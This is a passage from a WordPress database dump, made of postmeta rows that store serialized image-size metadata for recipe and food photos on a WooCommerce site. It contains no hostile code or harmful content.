file\";s:41:\"Kale_Spinach_ballssquare_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Kale_Spinach_ballssquare_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1511099625\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12076,4959,'_wp_attached_file','2020/04/quinoa_muffin_880x.jpg'),(12077,4959,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:30:\"2020/04/quinoa_muffin_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"quinoa_muffin_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"quinoa_muffin_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"quinoa_muffin_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483865247\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12078,4960,'_wp_attached_file','2020/04/sticki_cake_7_880x.jpg'),(12079,4960,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:30:\"2020/04/sticki_cake_7_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"sticki_cake_7_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"sticki_cake_7_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"sticki_cake_7_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1486639455\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12080,4961,'_wp_attached_file','2020/04/Turkey_Burger_880x.jpg'),(12081,4961,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:30:\"2020/04/Turkey_Burger_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"Turkey_Burger_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"Turkey_Burger_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Turkey_Burger_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1511103437\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12082,4962,'_wp_attached_file','2020/04/turkey_hash_880x.jpg'),(12083,4962,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:28:\"2020/04/turkey_hash_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"turkey_hash_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"turkey_hash_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"turkey_hash_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1511009764\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12086,4698,'_thumbnail_id','4953'),(12091,4697,'_thumbnail_id','4958'),(12100,4701,'_thumbnail_id','4962'),(12104,4703,'_thumbnail_id','4961'),(12113,4704,'_thumbnail_id','4959'),(12118,4707,'_thumbnail_id','4954'),(12123,4708,'_thumbnail_id','4960'),(12127,4709,'_thumbnail_id','4955'),(12132,4713,'_thumbnail_id','4956'),(12137,4715,'_thumbnail_id','4957'),(12139,4964,'_wp_attached_file','2020/04/Baked_potato_sfw_880x.jpg'),(12140,4964,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:33:\"2020/04/Baked_potato_sfw_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"Baked_potato_sfw_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1414940159\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12141,4965,'_wp_attached_file','2020/04/crumb_web_880x.jpg'),(12142,4965,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:26:\"2020/04/crumb_web_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"crumb_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"crumb_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"crumb_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1502035677\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12143,4966,'_wp_attached_file','2020/04/frit2_880x.jpg'),(12144,4966,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2020/04/frit2_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"frit2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"frit2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"frit2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"frit2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"frit2_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"frit2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"frit2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"frit2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"frit2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"frit2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\